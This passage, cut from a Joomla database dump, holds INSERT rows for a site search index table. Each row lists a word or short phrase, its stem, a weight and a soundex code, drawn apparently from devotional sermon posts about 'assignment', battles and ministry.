(295811, 'whenever the', 'whenev the', 0, 1, 1.4, 'W5163', 1, '*'),
(295812, 'whenever the voice', 'whenev the voice', 0, 1, 1.6, 'W516312', 1, '*'),
(295813, 'who will go', 'who will go', 0, 1, 1.3667, 'W420', 2, '*'),
(295814, 'whom shall', 'whom shall', 0, 1, 1.3333, 'W524', 2, '*'),
(295815, 'whom shall i', 'whom shall i', 0, 1, 1.4, 'W524', 2, '*'),
(295816, 'will be at', 'will be at', 0, 1, 1.3333, 'W413', 1, '*'),
(295817, 'will be dependent', 'will be dependent', 0, 1, 1.5667, 'W41315353', 1, '*'),
(295818, 'will flee', 'will flee', 0, 1, 1.3, 'W414', 1, '*'),
(295819, 'will flee from', 'will flee from', 0, 1, 1.4667, 'W414165', 1, '*'),
(295820, 'will go for', 'will go for', 0, 1, 1.3667, 'W4216', 2, '*'),
(295821, 'will guaranty', 'will guaranty', 0, 1, 1.4333, 'W42653', 1, '*'),
(295822, 'will guaranty your', 'will guaranty your', 0, 1, 1.6, 'W426536', 1, '*'),
(295823, 'will they', 'will they', 0, 1, 1.3, 'W430', 1, '*'),
(295824, 'will they not', 'will they not', 0, 1, 1.4333, 'W4353', 1, '*'),
(295825, 'with power', 'with power', 0, 1, 1.3333, 'W316', 1, '*'),
(295826, 'with power it', 'with power it', 0, 1, 1.4333, 'W3163', 1, '*'),
(295827, 'word behind', 'word behind', 0, 1, 1.3667, 'W63153', 1, '*'),
(295828, 'word behind thee', 'word behind thee', 0, 1, 1.5333, 'W63153', 1, '*'),
(295829, 'world but it', 'world but it', 0, 1, 1.4, 'W64313', 1, '*'),
(295830, 'wrong voice', 'wrong voice', 0, 1, 1.3667, 'W65212', 1, '*'),
(295831, 'wrong voice isaiah', 'wrong voice isaiah', 0, 1, 1.6, 'W65212', 1, '*'),
(295832, 'ye in', 'ye in', 0, 1, 1.1667, 'Y500', 1, '*'),
(295833, 'ye in it', 'ye in it', 0, 1, 1.2667, 'Y530', 1, '*'),
(295834, 'ye turn', 'ye turn', 0, 1, 1.2333, 'Y365', 1, '*'),
(295835, 'ye turn to', 'ye turn to', 0, 1, 1.3333, 'Y3653', 1, '*'),
(295836, 'you can recognize', 'you can recognize', 0, 1, 1.5667, 'Y256252', 1, '*'),
(295837, 'you go in', 'you go in', 0, 1, 1.3, 'Y250', 1, '*'),
(295838, 'you in 2017', 'you in 2017', 0, 1, 1.3667, 'Y500', 1, '*'),
(295839, 'you see people', 'you see people', 0, 1, 1.4667, 'Y214', 1, '*'),
(295840, 'you to master', 'you to master', 0, 1, 1.4333, 'Y35236', 1, '*'),
(295841, 'your ability', 'your ability', 0, 1, 1.4, 'Y6143', 1, '*'),
(295842, 'your ability to', 'your ability to', 0, 1, 1.5, 'Y6143', 1, '*'),
(295843, 'your desire', 'your desire', 0, 1, 1.3667, 'Y6326', 1, '*'),
(295844, 'your desire and', 'your desire and', 0, 1, 1.5, 'Y632653', 1, '*'),
(295845, 'your next', 'your next', 0, 1, 1.3, 'Y6523', 1, '*'),
(295846, 'your next level', 'your next level', 0, 1, 1.5, 'Y6523414', 1, '*'),
(295847, 'your perpetual', 'your perpetual', 0, 1, 1.4667, 'Y616134', 1, '*'),
(295848, 'your perpetual victory', 'your perpetual victory', 0, 1, 1.7333, 'Y6161341236', 1, '*'),
(295849, 'your security', 'your security', 0, 1, 1.4333, 'Y6263', 1, '*'),
(295850, 'your security and', 'your security and', 0, 1, 1.5667, 'Y626353', 1, '*'),
(295851, 'your son-ship', 'your son-ship', 0, 1, 1.4333, 'Y62521', 1, '*'),
(295852, 'your son-ship is', 'your son-ship is', 0, 1, 1.5333, 'Y625212', 1, '*'),
(295853, '“also', '“also', 0, 0, 0.3333, '“420', 1, '*'),
(295854, '“also i', '“also i', 0, 1, 1.2333, '“420', 1, '*'),
(295855, '“also i heard', '“also i heard', 0, 1, 1.4333, '“4263', 1, '*'),
(295856, '“the lord', '“the lord', 0, 1, 1.3, '“3463', 1, '*'),
(295857, '“the lord called', '“the lord called', 0, 1, 1.5333, '“3463243', 1, '*'),
(296178, '26 02', '26 02', 0, 1, 1.1667, '', 1, '*'),
(296179, '26 02 2017', '26 02 2017', 0, 1, 1.3333, '', 1, '*'),
(296180, '27 from', '27 from', 0, 1, 1.2333, 'F650', 1, '*'),
(296181, '27 from our', '27 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(296182, 'demonic fronts actually', 'demon fronts actually', 0, 1, 1.7667, 'D521653234', 2, '*'),
(296183, 'fronts actually', 'front actually', 0, 1, 1.5, 'F653234', 2, '*'),
(296184, 'fronts actually advance', 'front actually advance', 0, 1, 1.7667, 'F6532343152', 1, '*'),
(296185, 'heart 26 02', 'heart 26 02', 0, 1, 1.3667, 'H630', 1, '*'),
(296186, 'is training therefore', 'is training therefore', 0, 1, 1.7, 'I236523616', 1, '*'),
(296187, 'item 27', 'item 27', 0, 1, 1.2333, 'I350', 1, '*'),
(296188, 'item 27 from', 'item 27 from', 0, 1, 1.4, 'I35165', 1, '*'),
(296189, 'k2 item 27', 'k2 item 27', 0, 1, 1.3333, 'K350', 1, '*'),
(296190, 'produce translateyour', 'produc translateyour', 0, 1, 1.7, 'P6323652436', 1, '*'),
(296191, 'produce translateyour training', 'produc translateyour training', 0, 1, 2, 'P63236524363652', 1, '*'),
(296192, 'to produce translateyour', 'to produce translateyour', 0, 1, 1.8, 'T16323652436', 1, '*'),
(296193, 'training therefore', 'train therefore', 0, 1, 1.6, 'T6523616', 1, '*'),
(296194, 'training therefore you', 'train therefore you', 0, 1, 1.7333, 'T6523616', 1, '*'),
(296195, 'translateyour', 'translateyour', 0, 0, 0.8667, 'T652436', 1, '*'),
(296196, 'translateyour training', 'translateyour training', 0, 1, 1.7333, 'T6524363652', 1, '*'),
(296197, 'translateyour training into', 'translateyour training into', 0, 1, 1.9, 'T652436365253', 1, '*'),
(296209, '05 03', '05 03', 0, 1, 1.1667, '', 1, '*'),
(296210, '05 03 2017', '05 03 2017', 0, 1, 1.3333, '', 1, '*'),
(296211, '29 from', '29 from', 0, 1, 1.2333, 'F650', 1, '*'),
(296212, '29 from our', '29 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(296213, 'actually advancethrough', 'actual advancethrough', 0, 1, 1.7667, 'A2343152362', 1, '*'),
(296214, 'actually advancethrough unbroken', 'actual advancethrough unbroken', 0, 1, 2, 'A234315236251625', 1, '*'),
(296215, 'advancethrough', 'advancethrough', 0, 0, 0.9333, 'A3152362', 1, '*'),
(296216, 'advancethrough unbroken', 'advancethrough unbroken', 0, 1, 1.7667, 'A315236251625', 1, '*'),
(296217, 'advancethrough unbroken negative', 'advancethrough unbroken negative', 0, 1, 2, 'A315236251625231', 1, '*'),
(296218, 'fronts actually advancethrough', 'front actually advancethrough', 0, 1, 2, 'F6532343152362', 1, '*'),
(296219, 'habit the', 'habit the', 0, 1, 1.3, 'H130', 1, '*'),
(296220, 'habit the lord', 'habit the lord', 0, 1, 1.4667, 'H13463', 1, '*'),
(296221, 'heart 05 03', 'heart 05 03', 0, 1, 1.3667, 'H630', 1, '*'),
(296222, 'item 29', 'item 29', 0, 1, 1.2333, 'I350', 1, '*'),
(296223, 'item 29 from', 'item 29 from', 0, 1, 1.4, 'I35165', 1, '*'),
(296224, 'k2 item 29', 'k2 item 29', 0, 1, 1.3333, 'K350', 1, '*'),
(296225, 'produce translate', 'produc translate', 0, 1, 1.5667, 'P632365243', 1, '*'),
(296226, 'produce translate your', 'produc translate your', 0, 1, 1.7333, 'P6323652436', 1, '*'),
(296227, 'to produce translate', 'to produce translate', 0, 1, 1.6667, 'T1632365243', 1, '*'),
(296228, 'your habit the', 'your habit the', 0, 1, 1.4667, 'Y613', 1, '*'),
(296229, 'your training into', 'your training into', 0, 1, 1.6, 'Y6365253', 1, '*'),
(296240, '12 03', '12 03', 0, 1, 1.1667, '', 1, '*'),
(296241, '12 03 2017', '12 03 2017', 0, 1, 1.3333, '', 1, '*'),
(296242, '30 from', '30 from', 0, 1, 1.2333, 'F650', 1, '*'),
(296243, '30 from our', '30 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(296244, 'a believer', 'a believer', 0, 1, 1.3333, 'A1416', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(296245, 'a believer till', 'a believer till', 0, 1, 1.5, 'A141634', 1, '*'),
(296246, 'a man can', 'a man can', 0, 1, 1.3, 'A525', 1, '*'),
(296247, 'a ministry', 'a ministry', 0, 1, 1.3333, 'A5236', 1, '*'),
(296248, 'a ministry but', 'a ministry but', 0, 1, 1.4667, 'A523613', 1, '*'),
(296249, 'a promotion', 'a promotion', 0, 1, 1.3667, 'A16535', 1, '*'),
(296250, 'a promotion battle', 'a promotion battle', 0, 1, 1.6, 'A16535134', 1, '*'),
(296251, 'a steward', 'a steward', 0, 1, 1.3, 'A2363', 1, '*'),
(296252, 'a steward who', 'a steward who', 0, 1, 1.4333, 'A2363', 1, '*'),
(296253, 'a student', 'a student', 0, 1, 1.3, 'A2353', 1, '*'),
(296254, 'a student that', 'a student that', 0, 1, 1.4667, 'A2353', 1, '*'),
(296255, 'about assignment', 'about assignment', 0, 1, 1.5333, 'A13253', 1, '*'),
(296256, 'about assignment god', 'about assignment god', 0, 1, 1.6667, 'A1325323', 1, '*'),
(296257, 'added to', 'ad to', 0, 1, 1.2667, 'A300', 2, '*'),
(296258, 'added to your', 'ad to your', 0, 1, 1.4333, 'A360', 1, '*'),
(296259, 'am saying', 'am saying', 0, 1, 1.3, 'A5252', 1, '*'),
(296260, 'am saying this', 'am saying this', 0, 1, 1.4667, 'A525232', 1, '*'),
(296261, 'and ask', 'and ask', 0, 1, 1.2333, 'A532', 1, '*'),
(296262, 'and ask samson', 'and ask samson', 0, 1, 1.4667, 'A532525', 1, '*'),
(296263, 'and damaged', 'and damaged', 0, 1, 1.3667, 'A53523', 1, '*'),
(296264, 'and damaged his', 'and damaged his', 0, 1, 1.5, 'A535232', 1, '*'),
(296265, 'and eventually', 'and eventually', 0, 1, 1.4667, 'A531534', 2, '*'),
(296266, 'and eventually god', 'and eventually god', 0, 1, 1.6, 'A53153423', 1, '*'),
(296267, 'and seriousness', 'and seriousness', 0, 1, 1.5, 'A5326252', 1, '*'),
(296268, 'and seriousness to', 'and seriousness to', 0, 1, 1.6, 'A53262523', 1, '*'),
(296269, 'and that was', 'and that was', 0, 1, 1.4, 'A532', 1, '*'),
(296270, 'and we fight', 'and we fight', 0, 1, 1.4, 'A53123', 1, '*'),
(296271, 'apply', 'appli', 0, 0, 0.3333, 'A140', 1, '*'),
(296272, 'apply diligence', 'appli diligence', 0, 1, 1.5, 'A1434252', 1, '*'),
(296273, 'apply diligence and', 'appli diligence and', 0, 1, 1.6333, 'A143425253', 1, '*'),
(296274, 'are being', 'ar being', 0, 1, 1.3, 'A6152', 1, '*'),
(296275, 'are being given', 'ar being given', 0, 1, 1.5, 'A615215', 1, '*'),
(296276, 'are doing fine', 'ar doing fine', 0, 1, 1.4667, 'A635215', 1, '*'),
(296277, 'are doing well', 'ar doing well', 0, 1, 1.4667, 'A63524', 1, '*'),
(296278, 'are given', 'ar given', 0, 1, 1.3, 'A6215', 1, '*'),
(296279, 'are given in', 'ar given in', 0, 1, 1.4, 'A6215', 1, '*'),
(296280, 'are in business', 'ar in business', 0, 1, 1.5, 'A651252', 1, '*'),
(296281, 'are in handling', 'ar in handling', 0, 1, 1.5, 'A653452', 1, '*'),
(296282, 'are not ready', 'ar not ready', 0, 1, 1.4333, 'A65363', 1, '*'),
(296283, 'are pregnant', 'ar pregnant', 0, 1, 1.4, 'A616253', 1, '*'),
(296284, 'are pregnant what', 'ar pregnant what', 0, 1, 1.5667, 'A616253', 1, '*'),
(296285, 'are rather', 'ar rather', 0, 1, 1.3333, 'A636', 1, '*'),
(296286, 'are rather he', 'ar rather he', 0, 1, 1.4333, 'A636', 1, '*'),
(296287, 'are two kinds', 'ar two kinds', 0, 1, 1.4333, 'A632532', 1, '*'),
(296288, 'as a believer', 'as a believer', 0, 1, 1.4333, 'A21416', 2, '*'),
(296289, 'as you give', 'as you give', 0, 1, 1.3667, 'A210', 1, '*'),
(296290, 'ask samson', 'ask samson', 0, 1, 1.3333, 'A2525', 1, '*'),
(296291, 'ask samson when', 'ask samson when', 0, 1, 1.5, 'A2525', 1, '*'),
(296292, 'assignment and', 'assign and', 0, 1, 1.4667, 'A25353', 1, '*'),
(296293, 'assignment and it', 'assign and it', 0, 1, 1.5667, 'A25353', 1, '*'),
(296294, 'assignment delilah', 'assign delilah', 0, 1, 1.6, 'A2534', 1, '*'),
(296295, 'assignment delilah showed', 'assign delilah showed', 0, 1, 1.8333, 'A253423', 1, '*'),
(296296, 'assignment don\'t just', 'assign don just', 0, 1, 1.7, 'A2535323', 1, '*'),
(296297, 'assignment faithfulness', 'assign faithfulness', 0, 1, 1.7667, 'A253131452', 1, '*'),
(296298, 'assignment faithfulness with', 'assign faithfulness with', 0, 1, 1.9333, 'A2531314523', 1, '*'),
(296299, 'assignment god', 'assign god', 0, 1, 1.4667, 'A25323', 2, '*'),
(296300, 'assignment god does', 'assign god does', 0, 1, 1.6333, 'A253232', 1, '*'),
(296301, 'assignment in zion', 'assign in zion', 0, 1, 1.6, 'A253525', 1, '*'),
(296302, 'assignment is', 'assign is', 0, 1, 1.4333, 'A2532', 2, '*'),
(296303, 'assignment is being', 'assign is being', 0, 1, 1.6333, 'A2532152', 1, '*'),
(296304, 'assignment is different', 'assign is different', 0, 1, 1.7667, 'A253231653', 1, '*'),
(296305, 'assignment is to', 'assign is to', 0, 1, 1.5333, 'A25323', 1, '*'),
(296306, 'assignment is what', 'assign is what', 0, 1, 1.6, 'A25323', 1, '*'),
(296307, 'assignment serious', 'assign serious', 0, 1, 1.6, 'A253262', 1, '*'),
(296308, 'assignment serious and', 'assign serious and', 0, 1, 1.7333, 'A25326253', 1, '*'),
(296309, 'assignment serious assignment', 'assign serious assignment', 0, 1, 1.9667, 'A25326253', 1, '*'),
(296310, 'assignment serious before', 'assign serious before', 0, 1, 1.8333, 'A25326216', 1, '*'),
(296311, 'assignment serious not', 'assign serious not', 0, 1, 1.7333, 'A25326253', 1, '*'),
(296312, 'assignment serious something', 'assign serious something', 0, 1, 1.9333, 'A2532625352', 1, '*'),
(296313, 'assignment such', 'assign such', 0, 1, 1.5, 'A2532', 1, '*'),
(296314, 'assignment such men', 'assign such men', 0, 1, 1.6333, 'A25325', 1, '*'),
(296315, 'assignment that sustains', 'assign that sustains', 0, 1, 1.8, 'A2532352', 1, '*'),
(296316, 'assignment when', 'assign when', 0, 1, 1.5, 'A2535', 1, '*'),
(296317, 'assignment when god', 'assign when god', 0, 1, 1.6333, 'A253523', 1, '*'),
(296318, 'assignment when your', 'assign when your', 0, 1, 1.6667, 'A25356', 1, '*'),
(296319, 'assignment will', 'assign will', 0, 1, 1.5, 'A2534', 1, '*'),
(296320, 'assignment will either', 'assign will either', 0, 1, 1.7333, 'A253436', 1, '*'),
(296321, 'assignment your', 'assign your', 0, 1, 1.5, 'A2536', 1, '*'),
(296322, 'assignment your ministry', 'assign your ministry', 0, 1, 1.8, 'A25365236', 1, '*'),
(296323, 'assignments assignment', 'assign assignment', 0, 1, 1.7333, 'A253253', 1, '*'),
(296324, 'assignments assignment is', 'assign assignment is', 0, 1, 1.8333, 'A2532532', 1, '*'),
(296325, 'assignments god', 'assign god', 0, 1, 1.5, 'A25323', 1, '*'),
(296326, 'assignments god doesn\'t', 'assign god doesn', 0, 1, 1.7667, 'A25323253', 1, '*'),
(296327, 'assignments in dream', 'assign in dream', 0, 1, 1.6667, 'A25325365', 1, '*'),
(296328, 'assignments it', 'assign it', 0, 1, 1.4667, 'A25323', 1, '*'),
(296329, 'assignments it doesn\'t', 'assign it doesn', 0, 1, 1.7333, 'A25323253', 1, '*'),
(296330, 'assignments serious', 'assign serious', 0, 1, 1.6333, 'A253262', 1, '*'),
(296331, 'assignments serious that', 'assign serious that', 0, 1, 1.8, 'A2532623', 1, '*'),
(296332, 'assignments serious why', 'assign serious why', 0, 1, 1.7667, 'A253262', 1, '*'),
(296333, 'at how responsible', 'at how responsible', 0, 1, 1.6, 'A36215214', 1, '*'),
(296334, 'at how successful', 'at how successful', 0, 1, 1.5667, 'A3214', 1, '*'),
(296335, 'battle he', 'battl he', 0, 1, 1.3, 'B340', 1, '*'),
(296336, 'battle he didn\'t', 'battl he didn', 0, 1, 1.5333, 'B34353', 1, '*'),
(296337, 'battle is', 'battl is', 0, 1, 1.3, 'B342', 1, '*'),
(296338, 'battle is a', 'battl is a', 0, 1, 1.3667, 'B342', 1, '*'),
(296339, 'battle showed', 'battl showed', 0, 1, 1.4333, 'B3423', 1, '*'),
(296340, 'battle showed up', 'battl showed up', 0, 1, 1.5333, 'B34231', 1, '*'),
(296341, 'battle shows', 'battl shows', 0, 1, 1.4, 'B342', 1, '*'),
(296342, 'battle shows up', 'battl shows up', 0, 1, 1.5, 'B3421', 1, '*'),
(296343, 'battles and', 'battl and', 0, 1, 1.3667, 'B34253', 1, '*'),
(296344, 'battles and we', 'battl and we', 0, 1, 1.4667, 'B34253', 1, '*'),
(296345, 'battles in', 'battl in', 0, 1, 1.3333, 'B3425', 1, '*'),
(296346, 'battles in life', 'battl in life', 0, 1, 1.5, 'B342541', 1, '*'),
(296347, 'battles of your', 'battl of your', 0, 1, 1.5, 'B34216', 1, '*'),
(296348, 'battles there', 'battl there', 0, 1, 1.4333, 'B34236', 1, '*'),
(296349, 'battles there are', 'battl there are', 0, 1, 1.5667, 'B34236', 1, '*'),
(296350, 'battles what', 'battl what', 0, 1, 1.4, 'B3423', 1, '*'),
(296351, 'battles what you', 'battl what you', 0, 1, 1.5333, 'B3423', 1, '*'),
(296352, 'be added', 'be added', 0, 1, 1.2667, 'B300', 1, '*'),
(296353, 'be added to', 'be added to', 0, 1, 1.3667, 'B300', 1, '*'),
(296354, 'be enthronement', 'be enthronement', 0, 1, 1.5, 'B53653', 1, '*'),
(296355, 'be enthronement of', 'be enthronement of', 0, 1, 1.6, 'B536531', 1, '*'),
(296356, 'be here', 'be here', 0, 1, 1.2333, 'B600', 1, '*'),
(296357, 'be here for', 'be here for', 0, 1, 1.3667, 'B616', 1, '*'),
(296358, 'be manifestations', 'be manifestations', 0, 1, 1.5667, 'B512352', 1, '*'),
(296359, 'be manifestations of', 'be manifestations of', 0, 1, 1.6667, 'B5123521', 1, '*'),
(296360, 'be withdrawn', 'be withdrawn', 0, 1, 1.4, 'B365', 1, '*'),
(296361, 'be withdrawn stop', 'be withdrawn stop', 0, 1, 1.5667, 'B365231', 1, '*'),
(296362, 'because god told', 'becaus god told', 0, 1, 1.5333, 'B2343', 1, '*'),
(296363, 'because he was', 'becaus he was', 0, 1, 1.4667, 'B200', 1, '*'),
(296364, 'because of your', 'becaus of your', 0, 1, 1.5, 'B216', 1, '*'),
(296365, 'been taking', 'been taking', 0, 1, 1.3667, 'B53252', 1, '*'),
(296366, 'been taking assignment', 'been taking assignment', 0, 1, 1.7333, 'B5325253', 1, '*'),
(296367, 'before goliath\'s', 'befor goliath', 0, 1, 1.5333, 'B62432', 1, '*'),
(296368, 'before goliath\'s battle', 'befor goliath battle', 0, 1, 1.7667, 'B62432134', 1, '*'),
(296369, 'being given the', 'be given the', 0, 1, 1.5, 'B52153', 1, '*'),
(296370, 'being withdrawn', 'be withdrawn', 0, 1, 1.5, 'B52365', 1, '*'),
(296371, 'being withdrawn from', 'be withdrawn from', 0, 1, 1.6667, 'B52365165', 1, '*'),
(296372, 'believer till', 'believ till', 0, 1, 1.4333, 'B41634', 1, '*'),
(296373, 'believer till next', 'believ till next', 0, 1, 1.6, 'B41634523', 1, '*'),
(296374, 'beloved i', 'belov i', 0, 1, 1.3, 'B413', 2, '*'),
(296375, 'beloved i want', 'belov i want', 0, 1, 1.4667, 'B41353', 2, '*'),
(296376, 'best to', 'best to', 0, 1, 1.2333, 'B230', 1, '*'),
(296377, 'best to assignment', 'best to assignment', 0, 1, 1.6, 'B23253', 1, '*'),
(296378, 'business in rating', 'busi in rating', 0, 1, 1.6, 'B25256352', 1, '*'),
(296379, 'but for real', 'but for real', 0, 1, 1.4, 'B3164', 1, '*'),
(296380, 'but without assignment', 'but without assignment', 0, 1, 1.7333, 'B3253', 1, '*'),
(296381, 'can have a', 'can have a', 0, 1, 1.3333, 'C510', 1, '*'),
(296382, 'careless with assignment', 'careless with assignment', 0, 1, 1.8, 'C6423253', 1, '*'),
(296383, 'carry it is', 'carri it is', 0, 1, 1.3667, 'C632', 1, '*'),
(296384, 'centre how', 'centr how', 0, 1, 1.3333, 'C536', 1, '*'),
(296385, 'centre how do', 'centr how do', 0, 1, 1.4333, 'C5363', 1, '*'),
(296386, 'change your level', 'chang your level', 0, 1, 1.5667, 'C526414', 1, '*'),
(296387, 'check the', 'check the', 0, 1, 1.3, 'C300', 1, '*'),
(296388, 'check the assignment', 'check the assignment', 0, 1, 1.6667, 'C3253', 1, '*'),
(296389, 'church do', 'church do', 0, 1, 1.3, 'C623', 2, '*'),
(296390, 'church do it', 'church do it', 0, 1, 1.4, 'C623', 1, '*'),
(296391, 'clean the', 'clean the', 0, 1, 1.3, 'C453', 1, '*'),
(296392, 'clean the church', 'clean the church', 0, 1, 1.5333, 'C453262', 1, '*'),
(296393, 'comes for us', 'come for us', 0, 1, 1.4, 'C52162', 1, '*'),
(296394, 'confuse', 'confus', 0, 0, 0.4667, 'C512', 1, '*'),
(296395, 'confuse the', 'confus the', 0, 1, 1.3667, 'C5123', 1, '*'),
(296396, 'confuse the two', 'confus the two', 0, 1, 1.5, 'C5123', 1, '*'),
(296397, 'create or', 'creat or', 0, 1, 1.3, 'C636', 1, '*'),
(296398, 'create or destroy', 'creat or destroy', 0, 1, 1.5667, 'C6363236', 1, '*'),
(296399, 'critical truths', 'critic truths', 0, 1, 1.5, 'C63243632', 1, '*'),
(296400, 'critical truths about', 'critic truths about', 0, 1, 1.7, 'C6324363213', 1, '*'),
(296401, 'damaged', 'damag', 0, 0, 0.4667, 'D523', 1, '*'),
(296402, 'damaged his', 'damag his', 0, 1, 1.3667, 'D5232', 1, '*'),
(296403, 'damaged his destiny', 'damag his destiny', 0, 1, 1.6333, 'D52323235', 1, '*'),
(296404, 'david had been', 'david had been', 0, 1, 1.4667, 'D1315', 1, '*'),
(296405, 'dearly beloved i', 'dearli beloved i', 0, 1, 1.5333, 'D641413', 2, '*'),
(296406, 'decided', 'decid', 0, 0, 0.4667, 'D230', 1, '*'),
(296407, 'decided to', 'decid to', 0, 1, 1.3333, 'D230', 1, '*'),
(296408, 'decided to be', 'decid to be', 0, 1, 1.4333, 'D231', 1, '*'),
(296409, 'delilah', 'delilah', 0, 0, 0.4667, 'D400', 1, '*'),
(296410, 'delilah showed', 'delilah showed', 0, 1, 1.4667, 'D423', 1, '*'),
(296411, 'delilah showed up', 'delilah showed up', 0, 1, 1.5667, 'D4231', 1, '*'),
(296412, 'deliveries', 'deliveri', 0, 0, 0.6667, 'D4162', 1, '*'),
(296413, 'deliveries will', 'deliveri will', 0, 1, 1.5, 'D41624', 1, '*'),
(296414, 'deliveries will be', 'deliveri will be', 0, 1, 1.6, 'D416241', 1, '*'),
(296415, 'destiny seriously', 'destini seriously', 0, 1, 1.5667, 'D2352624', 1, '*'),
(296416, 'destiny seriously joseph', 'destini seriously joseph', 0, 1, 1.8, 'D235262421', 1, '*'),
(296417, 'destroy your future', 'destroi your future', 0, 1, 1.6333, 'D236136', 1, '*'),
(296418, 'determines if', 'determin if', 0, 1, 1.4333, 'D6521', 1, '*'),
(296419, 'determines if he', 'determin if he', 0, 1, 1.5333, 'D6521', 1, '*'),
(296420, 'determines your future', 'determin your future', 0, 1, 1.7333, 'D6526136', 1, '*'),
(296421, 'develops', 'develop', 0, 0, 0.5333, 'D1412', 1, '*'),
(296422, 'develops your', 'develop your', 0, 1, 1.4333, 'D14126', 1, '*'),
(296423, 'develops your potential', 'develop your potential', 0, 1, 1.7667, 'D1412613534', 1, '*'),
(296424, 'didn\'t fail', 'didn fail', 0, 1, 1.3667, 'D5314', 1, '*'),
(296425, 'didn\'t fail because', 'didn fail because', 0, 1, 1.6333, 'D531412', 1, '*'),
(296426, 'difference in', 'differ in', 0, 1, 1.4333, 'D16525', 1, '*'),
(296427, 'difference in your', 'differ in your', 0, 1, 1.6, 'D165256', 1, '*'),
(296428, 'different from', 'differ from', 0, 1, 1.4667, 'D1653165', 2, '*'),
(296429, 'different from ministry', 'differ from ministry', 0, 1, 1.7667, 'D1653165236', 1, '*'),
(296430, 'diligence', 'dilig', 0, 0, 0.6, 'D4252', 1, '*'),
(296431, 'diligence and', 'dilig and', 0, 1, 1.4333, 'D425253', 1, '*'),
(296432, 'diligence and seriousness', 'dilig and seriousness', 0, 1, 1.8333, 'D42525326252', 1, '*'),
(296433, 'does not look', 'doe not look', 0, 1, 1.4333, 'D25342', 1, '*'),
(296434, 'doesn\'t give', 'doesn give', 0, 1, 1.4, 'D25321', 1, '*'),
(296435, 'doesn\'t give hand-outs', 'doesn give hand-outs', 0, 1, 1.7333, 'D25321532', 1, '*'),
(296436, 'doesn\'t give titles', 'doesn give titles', 0, 1, 1.6333, 'D25321342', 1, '*'),
(296437, 'doesn\'t matter the', 'doesn matter the', 0, 1, 1.6, 'D2535363', 1, '*'),
(296438, 'doing fine', 'do fine', 0, 1, 1.3333, 'D5215', 1, '*'),
(296439, 'doing fine check', 'do fine check', 0, 1, 1.5333, 'D52152', 1, '*'),
(296440, 'doing something to', 'do something to', 0, 1, 1.6, 'D5253523', 1, '*'),
(296441, 'doing too', 'do too', 0, 1, 1.3, 'D523', 1, '*'),
(296442, 'doing too well', 'do too well', 0, 1, 1.4667, 'D5234', 1, '*'),
(296443, 'doing well', 'do well', 0, 1, 1.3333, 'D524', 1, '*'),
(296444, 'doing well spiritually', 'do well spiritually', 0, 1, 1.7333, 'D52421634', 1, '*'),
(296445, 'don\'t just be', 'don just be', 0, 1, 1.4333, 'D53231', 1, '*'),
(296446, 'don\'t last', 'don last', 0, 1, 1.3333, 'D53423', 1, '*'),
(296447, 'don\'t last and', 'don last and', 0, 1, 1.4667, 'D5342353', 1, '*'),
(296448, 'dream centre how', 'dream centre how', 0, 1, 1.5333, 'D652536', 1, '*'),
(296449, 'either create', 'either create', 0, 1, 1.4333, 'E36263', 1, '*'),
(296450, 'either create or', 'either create or', 0, 1, 1.5333, 'E362636', 1, '*'),
(296451, 'enthronement', 'enthron', 0, 0, 0.8, 'E53653', 1, '*'),
(296452, 'enthronement of', 'enthron of', 0, 1, 1.5, 'E536531', 1, '*'),
(296453, 'enthronement of mediocrity', 'enthron of mediocrity', 0, 1, 1.8667, 'E53653153263', 1, '*'),
(296454, 'eventually god', 'eventu god', 0, 1, 1.4667, 'E153423', 1, '*'),
(296455, 'eventually god will', 'eventu god will', 0, 1, 1.6333, 'E1534234', 1, '*'),
(296456, 'fail because', 'fail because', 0, 1, 1.4, 'F412', 1, '*'),
(296457, 'fail because he', 'fail because he', 0, 1, 1.5, 'F412', 1, '*'),
(296458, 'fail in assignment', 'fail in assignment', 0, 1, 1.6, 'F45253', 1, '*'),
(296459, 'faithfulness with', 'faith with', 0, 1, 1.5667, 'F314523', 1, '*'),
(296460, 'faithfulness with assignment', 'faith with assignment', 0, 1, 1.9333, 'F314523253', 1, '*'),
(296461, 'fight battles', 'fight battles', 0, 1, 1.4333, 'F231342', 1, '*'),
(296462, 'fight battles and', 'fight battles and', 0, 1, 1.5667, 'F23134253', 1, '*'),
(296463, 'fight battles of', 'fight battles of', 0, 1, 1.5333, 'F2313421', 1, '*'),
(296464, 'fight battles what', 'fight battles what', 0, 1, 1.6, 'F2313423', 1, '*'),
(296465, 'fine', 'fine', 0, 0, 0.2667, 'F500', 1, '*'),
(296466, 'fine check', 'fine check', 0, 1, 1.3333, 'F520', 1, '*'),
(296467, 'fine check the', 'fine check the', 0, 1, 1.4667, 'F523', 1, '*'),
(296468, 'for ministry', 'for ministry', 0, 1, 1.4, 'F65236', 1, '*'),
(296469, 'for ministry assignment', 'for ministry assignment', 0, 1, 1.7667, 'F65236253', 1, '*'),
(296470, 'for posting', 'for posting', 0, 1, 1.3667, 'F612352', 1, '*'),
(296471, 'for posting until', 'for posting until', 0, 1, 1.5667, 'F612352534', 1, '*'),
(296472, 'for promotion', 'for promotion', 0, 1, 1.4333, 'F616535', 1, '*'),
(296473, 'for promotion or', 'for promotion or', 0, 1, 1.5333, 'F6165356', 1, '*'),
(296474, 'for real', 'for real', 0, 1, 1.2667, 'F640', 1, '*'),
(296475, 'for real give', 'for real give', 0, 1, 1.4333, 'F6421', 1, '*'),
(296476, 'for relevance', 'for relevance', 0, 1, 1.4333, 'F64152', 1, '*'),
(296477, 'for relevance in', 'for relevance in', 0, 1, 1.5333, 'F641525', 1, '*'),
(296478, 'for show', 'for show', 0, 1, 1.2667, 'F620', 1, '*'),
(296479, 'for show but', 'for show but', 0, 1, 1.4, 'F6213', 1, '*'),
(296480, 'for the i', 'for the i', 0, 1, 1.3, 'F630', 1, '*'),
(296481, 'for the sake', 'for the sake', 0, 1, 1.4, 'F632', 1, '*'),
(296482, 'for us i', 'for us i', 0, 1, 1.2667, 'F620', 1, '*'),
(296483, 'from ministry', 'from ministry', 0, 1, 1.4333, 'F65236', 1, '*'),
(296484, 'from ministry and', 'from ministry and', 0, 1, 1.5667, 'F6523653', 1, '*'),
(296485, 'from you it', 'from you it', 0, 1, 1.3667, 'F653', 1, '*'),
(296486, 'future it', 'futur it', 0, 1, 1.3, 'F363', 1, '*'),
